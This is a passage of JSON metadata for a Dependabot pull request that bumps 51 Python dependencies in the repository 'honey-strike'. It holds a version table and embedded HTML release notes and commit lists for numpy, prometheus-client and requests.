\u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31460\"\u003e#31460\u003c/a\u003e: BUG: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator...\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/b832a09cf2a169c833dd2371e7c07aa00b293242\"\u003e\u003ccode\u003eb832a09\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31462\"\u003e#31462\u003c/a\u003e from charris/prepare-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/57cc147d2ceacffc6534642bfbdebb3a80428e1e\"\u003e\u003ccode\u003e57cc147\u003c/code\u003e\u003c/a\u003e REL: Prepare for the NumPy 2.4.6 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/0c72b0b53b6b83c004e434b2c7855e73c000d21e\"\u003e\u003ccode\u003e0c72b0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31459\"\u003e#31459\u003c/a\u003e from charris/backport-31347\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/9778d26e0475d381ccb7817c3b4dd8cacef2b9eb\"\u003e\u003ccode\u003e9778d26\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/e0e38767d5d0f848ab44befeedcad71e8ef589c7\"\u003e\u003ccode\u003ee0e3876\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/d1bffeb9ec4ec0bf029c94ea35abffa92d5c30f2\"\u003e\u003ccode\u003ed1bffeb\u003c/code\u003e\u003c/a\u003e BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary \u003ccode\u003evh\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31347\"\u003e#31347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/8d8d7e5a14a1da0bfb0faf609a7a7610c431e6e9\"\u003e\u003ccode\u003e8d8d7e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31453\"\u003e#31453\u003c/a\u003e from seberg/issue-31452\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/bddaab7ace45f90148d8f2bb6e67daab2d45ec76\"\u003e\u003ccode\u003ebddaab7\u003c/code\u003e\u003c/a\u003e BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/37a1ecca8dff09b2c579a991194ac55b9971f3a7\"\u003e\u003ccode\u003e37a1ecc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31444\"\u003e#31444\u003c/a\u003e from charris/begin-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/3c0e043217a759a8a948ade158fec14348c3b459\"\u003e\u003ccode\u003e3c0e043\u003c/code\u003e\u003c/a\u003e MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/numpy/numpy/compare/v2.4.5...v2.4.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `prometheus-client` from 0.21.1 to 0.25.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/prometheus/client_python/releases\"\u003eprometheus-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.25.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix spaces in grouping key values for push_to_gateway by \u003ca href=\"https://github.com/veeceey\"\u003e\u003ccode\u003e@​veeceey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1156\"\u003eprometheus/client_python#1156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport MultiProcessCollector in RestrictedRegistry by \u003ca href=\"https://github.com/mathias-kende\"\u003e\u003ccode\u003e@​mathias-kende\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1150\"\u003eprometheus/client_python#1150\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/prometheus/client_python/compare/v0.24.1...v0.25.0\"\u003ehttps://github.com/prometheus/client_python/compare/v0.24.1...v0.25.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.24.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Django] Pass correct registry to MultiProcessCollector by \u003ca href=\"https://github.com/jelly\"\u003e\u003ccode\u003e@​jelly\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1152\"\u003eprometheus/client_python#1152\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.24.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd an AIOHTTP exporter by \u003ca href=\"https://github.com/Lexicality\"\u003e\u003ccode\u003e@​Lexicality\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1139\"\u003eprometheus/client_python#1139\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd remove_m...\n\n_Description has been truncated_","html_url":"https://github.com/AlexMatei1/honey-strike/pull/12","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/AlexMatei1%2Fhoney-strike/issues/12","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/12/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-07T22:11:12.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4608885696","node_id":"PR_kwDORQ8Eq87jsrVd","number":87,"state":"open","title":"chore(deps): bump the python-minor-patch group across 1 directory with 51 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-07T22:11:12.000Z","updated_at":"2026-06-08T01:04:54.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"python-minor-patch","update_count":51,"packages":[{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"torch","old_version":"2.11.0","new_version":"2.12.0","repository_url":"https://github.com/pytorch/pytorch"},{"name":"transformers","old_version":"5.7.0","new_version":"5.10.2","repository_url":"https://github.com/huggingface/transformers"},{"name":"sentence-transformers","old_version":"5.4.1","new_version":"5.5.1","repository_url":"https://github.com/huggingface/sentence-transformers"},{"name":"openai","old_version":"2.32.0","new_version":"2.41.0","repository_url":"https://github.com/openai/openai-python"},{"name":"anthropic","old_version":"0.96.0","new_version":"0.107.1","repository_url":"https://github.com/anthropics/anthropic-sdk-python"},{"name":"langchain-core","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langsmith","old_version":"0.8.4","new_version":"0.8.9","repository_url":"https://github.com/langchain-ai/langsmith-sdk"},{"name":"llama-index-core","old_version":"0.14.20","new_version":"0.14.22","repository_url":"https://github.com/run-llama/llama_index"},{"name":"fastapi","old_version":"0.136.0","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic","old_version":"2.13.1","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"python-multipart","old_version":"0.0.28","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"elevenlabs","old_version":"2.43.0","new_version":"2.51.0","repository_url":"https://github.com/elevenlabs/elevenlabs-python"},{"name":"onnxruntime","old_version":"1.22.0","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"onnxruntime-gpu","old_version":"1.24.4","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"grpcio","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"grpcio-tools","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"mujoco","old_version":"3.8.0","new_version":"3.9.0","repository_url":"https://github.com/google-deepmind/mujoco"},{"name":"scikit-learn","old_version":"1.6.1","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"qdrant-client","old_version":"1.17.1","new_version":"1.18.0","repository_url":"https://github.com/qdrant/qdrant-client"},{"name":"faiss-cpu","old_version":"1.13.2","new_version":"1.14.2","repository_url":"https://github.com/facebookresearch/faiss"},{"name":"polar-sdk","old_version":"0.31.3","new_version":"0.31.5","repository_url":"https://github.com/polarsource/polar-python"},{"name":"langgraph","old_version":"1.1.6","new_version":"1.2.4","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"haystack-ai","old_version":"2.27.0","new_version":"2.30.0","repository_url":"https://github.com/deepset-ai/haystack"},{"name":"litellm","old_version":"1.86.2","new_version":"1.88.0","repository_url":"https://github.com/BerriAI/litellm"},{"name":"mkdocs-jupyter","old_version":"0.26.2","new_version":"0.26.3","repository_url":"https://github.com/danielfrg/mkdocs-jupyter"},{"name":"opentelemetry-api","old_version":"1.41.0","new_version":"1.42.1","repository_url":"https://github.com/open-telemetry/opentelemetry-python"},{"name":"langfuse","old_version":"4.3.1","new_version":"4.7.1","repository_url":"https://github.com/langfuse/langfuse"},{"name":"gradio","old_version":"6.13.0","new_version":"6.16.0","repository_url":"https://github.com/gradio-app/gradio"},{"name":"pypdf","old_version":"6.10.2","new_version":"6.13.0","repository_url":"https://github.com/py-pdf/pypdf"},{"name":"beautifulsoup4","old_version":"4.14.3","new_version":"4.15.0"},{"name":"boto3","old_version":"1.42.90","new_version":"1.43.24","repository_url":"https://github.com/boto/boto3"},{"name":"notion-client","old_version":"3.0.0","new_version":"3.1.0","repository_url":"https://github.com/ramnes/notion-sdk-py"},{"name":"google-api-python-client","old_version":"2.194.0","new_version":"2.197.0","repository_url":"https://github.com/googleapis/google-api-python-client"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"psycopg2-binary","old_version":"2.9.11","new_version":"2.9.12","repository_url":"https://github.com/psycopg/psycopg2"},{"name":"google-cloud-aiplatform","old_version":"1.149.0","new_version":"1.156.0","repository_url":"https://github.com/googleapis/python-aiplatform"},{"name":"hypothesis","old_version":"6.151.10","new_version":"6.155.2","repository_url":"https://github.com/HypothesisWorks/hypothesis"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"ruff","old_version":"0.15.11","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"build","old_version":"1.4.3","new_version":"1.5.0","repository_url":"https://github.com/pypa/build"},{"name":"aiohappyeyeballs","old_version":"2.6.1","new_version":"2.6.2","repository_url":"https://github.com/aio-libs/aiohappyeyeballs"},{"name":"anyio","old_version":"4.12.1","new_version":"4.13.0","repository_url":"https://github.com/agronholm/anyio"},{"name":"certifi","old_version":"2026.2.25","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"huggingface-hub","old_version":"1.12.0","new_version":"1.18.0","repository_url":"https://github.com/huggingface/huggingface_hub"},{"name":"idna","old_version":"3.15","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"propcache","old_version":"0.4.1","new_version":"0.5.2","repository_url":"https://github.com/aio-libs/propcache"},{"name":"discord-py","old_version":"2.5.2","new_version":"2.7.1","repository_url":"https://github.com/Rapptz/discord.py"}],"path":null,"ecosystem":"pip"},"body":"[//]: # (dependabot-start)\n⚠️  **Dependabot is rebasing this PR** ⚠️ \n\nRebasing might not happen immediately, so don't worry if this takes some time.\n\nNote: if you make any changes to this PR yourself, they will take precedence over the rebase.\n\n---\n\n[//]: # (dependabot-end)\n\nBumps the python-minor-patch group with 50 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [torch](https://github.com/pytorch/pytorch) | `2.11.0` | `2.12.0` |\n| [transformers](https://github.com/huggingface/transformers) | `5.7.0` | `5.10.2` |\n| [sentence-transformers](https://github.com/huggingface/sentence-transformers) | `5.4.1` | `5.5.1` |\n| [openai](https://github.com/openai/openai-python) | `2.32.0` | `2.41.0` |\n| [anthropic](https://github.com/anthropics/anthropic-sdk-python) | `0.96.0` | `0.107.1` |\n| [langchain-core](https://github.com/langchain-ai/langchain) | `1.4.0` | `1.4.1` |\n| [langsmith](https://github.com/langchain-ai/langsmith-sdk) | `0.8.4` | `0.8.9` |\n| [llama-index-core](https://github.com/run-llama/llama_index) | `0.14.20` | `0.14.22` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.0` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.1` | `2.13.4` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.28` | `0.0.32` |\n| [elevenlabs](https://github.com/elevenlabs/elevenlabs-python) | `2.43.0` | `2.51.0` |\n| [onnxruntime](https://github.com/microsoft/onnxruntime) | `1.22.0` | `1.26.0` |\n| [onnxruntime-gpu](https://github.com/microsoft/onnxruntime) | `1.24.4` | `1.26.0` |\n| [grpcio](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [grpcio-tools](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [mujoco](https://github.com/google-deepmind/mujoco) | `3.8.0` | `3.9.0` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.6.1` | `1.9.0` |\n| [qdrant-client](https://github.com/qdrant/qdrant-client) | `1.17.1` | `1.18.0` |\n| [faiss-cpu](https://github.com/facebookresearch/faiss) | `1.13.2` | `1.14.2` |\n| [polar-sdk](https://github.com/polarsource/polar-python) | `0.31.3` | `0.31.5` |\n| [langgraph](https://github.com/langchain-ai/langgraph) | `1.1.6` | `1.2.4` |\n| [haystack-ai](https://github.com/deepset-ai/haystack) | `2.27.0` | `2.30.0` |\n| [litellm](https://github.com/BerriAI/litellm) | `1.86.2` | `1.88.0` |\n| [mkdocs-jupyter](https://github.com/danielfrg/mkdocs-jupyter) | `0.26.2` | `0.26.3` |\n| [opentelemetry-api](https://github.com/open-telemetry/opentelemetry-python) | `1.41.0` | `1.42.1` |\n| [langfuse](https://github.com/langfuse/langfuse) | `4.3.1` | `4.7.1` |\n| [gradio](https://github.com/gradio-app/gradio) | `6.13.0` | `6.16.0` |\n| [pypdf](https://github.com/py-pdf/pypdf) | `6.10.2` | `6.13.0` |\n| [beautifulsoup4](https://www.crummy.com/software/BeautifulSoup/bs4/) | `4.14.3` | `4.15.0` |\n| [boto3](https://github.com/boto/boto3) | `1.42.90` | `1.43.24` |\n| [notion-client](https://github.com/ramnes/notion-sdk-py) | `3.0.0` | `3.1.0` |\n| [google-api-python-client](https://github.com/googleapis/google-api-python-client) | `2.194.0` | `2.197.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [psycopg2-binary](https://github.com/psycopg/psycopg2) | `2.9.11` | `2.9.12` |\n| [google-cloud-aiplatform](https://github.com/googleapis/python-aiplatform) | `1.149.0` | `1.156.0` |\n| [hypothesis](https://github.com/HypothesisWorks/hypothesis) | `6.151.10` | `6.155.2` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.11` | `0.15.16` |\n| [build](https://github.com/pypa/build) | `1.4.3` | `1.5.0` |\n| [aiohappyeyeballs](https://github.com/aio-libs/aiohappyeyeballs) | `2.6.1` | `2.6.2` |\n| [anyio](https://github.com/agronholm/anyio) | `4.12.1` | `4.13.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.2.25` | `2026.5.20` |\n| [huggingface-hub](https://github.com/huggingface/huggingface_hub) | `1.12.0` | `1.18.0` |\n| [idna](https://github.com/kjd/idna) | `3.15` | `3.18` |\n| [propcache](https://github.com/aio-libs/propcache) | `0.4.1` | `0.5.2` |\n| [discord-py](https://github.com/Rapptz/discord.py) | `2.5.2` | `2.7.1` |\n\n\nUpdates `numpy` from 2.4.4 to 2.4.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/numpy/numpy/releases\"\u003enumpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.4.6 (May 18, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.6 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.6 is a quick release that fixes a regression discovered in the 2.4.5\nrelease.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 4 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e!EarlMilktea\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eSebastian Berg\u003c/li\u003e\n\u003cli\u003eWarren Weckesser\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePull requests merged\u003c/h2\u003e\n\u003cp\u003eA total of 4 pull requests were merged for this release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31444\"\u003e#31444\u003c/a\u003e: MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31453\"\u003e#31453\u003c/a\u003e: BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31459\"\u003e#31459\u003c/a\u003e: BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31460\"\u003e#31460\u003c/a\u003e: BUG: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator...\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.4.5 (May 15, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.5 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.5 is a patch release that fixes bugs discovered after the 2.4.4\nrelease, has some typing improvements, and maintains infrastructure.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 17 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAleksei Nikiforov\u003c/li\u003e\n\u003cli\u003eAnarion Zuo +\u003c/li\u003e\n\u003cli\u003eAnkit Ahlawat\u003c/li\u003e\n\u003cli\u003eBreno Favaretto +\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eIgor Krivenko +\u003c/li\u003e\n\u003cli\u003eIjtihed Kilani +\u003c/li\u003e\n\u003cli\u003eJoren Hammudoglu\u003c/li\u003e\n\u003cli\u003eMaarten Baert +\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/b832a09cf2a169c833dd2371e7c07aa00b293242\"\u003e\u003ccode\u003eb832a09\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31462\"\u003e#31462\u003c/a\u003e from charris/prepare-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/57cc147d2ceacffc6534642bfbdebb3a80428e1e\"\u003e\u003ccode\u003e57cc147\u003c/code\u003e\u003c/a\u003e REL: Prepare for the NumPy 2.4.6 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/0c72b0b53b6b83c004e434b2c7855e73c000d21e\"\u003e\u003ccode\u003e0c72b0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31459\"\u003e#31459\u003c/a\u003e from charris/backport-31347\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/9778d26e0475d381ccb7817c3b4dd8cacef2b9eb\"\u003e\u003ccode\u003e9778d26\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/e0e38767d5d0f848ab44befeedcad71e8ef589c7\"\u003e\u003ccode\u003ee0e3876\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/d1bffeb9ec4ec0bf029c94ea35abffa92d5c30f2\"\u003e\u003ccode\u003ed1bffeb\u003c/code\u003e\u003c/a\u003e BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary \u003ccode\u003evh\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31347\"\u003e#31347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/8d8d7e5a14a1da0bfb0faf609a7a7610c431e6e9\"\u003e\u003ccode\u003e8d8d7e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31453\"\u003e#31453\u003c/a\u003e from seberg/issue-31452\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/bddaab7ace45f90148d8f2bb6e67daab2d45ec76\"\u003e\u003ccode\u003ebddaab7\u003c/code\u003e\u003c/a\u003e BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/37a1ecca8dff09b2c579a991194ac55b9971f3a7\"\u003e\u003ccode\u003e37a1ecc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31444\"\u003e#31444\u003c/a\u003e from charris/begin-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/3c0e043217a759a8a948ade158fec14348c3b459\"\u003e\u003ccode\u003e3c0e043\u003c/code\u003e\u003c/a\u003e MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/numpy/numpy/compare/v2.4.4...v2.4.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.33.1 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.0\u003c/h2\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. \u003cstrong\u003eWe believe types are comprehensive but if you find issues, please\nreport them to the \u003ca href=\"https://redirect.github.com/psf/requests/issues/7271\"\u003epinned tracking issue\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca 